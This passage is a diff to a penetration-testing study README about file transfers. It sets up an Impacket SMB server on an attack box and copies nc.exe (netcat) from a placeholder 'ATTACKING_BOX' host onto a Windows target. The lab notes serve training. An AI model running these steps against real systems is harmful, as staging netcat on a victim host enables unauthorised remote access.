ma7moudShaaban/Penetration-Testing/Network/File Transfers/README.md

 - We need to create an SMB server in our Pwnbox with [smbserver.py](https://github.com/fortra/impacket/blob/master/examples/smbserver.py) from Impacket and then use `copy`, `move`, PowerShell `Copy-Item`, or any other tool that allows connection to SMB.
 - **Steps**
-    1. Create the SMB Server `sudo impacket-smbserver -smb2support CompData /tmp`
+    1. Create the SMB Server `sudo impacket-smbserver share -smb2support /tmp/smbshare`
     2. Copy a File from the SMB Server `C:\htb> copy \\ATTACKING_BOX\share\nc.exe`

 - New versions of Windows block unauthenticated guest access, as we can see in the following command: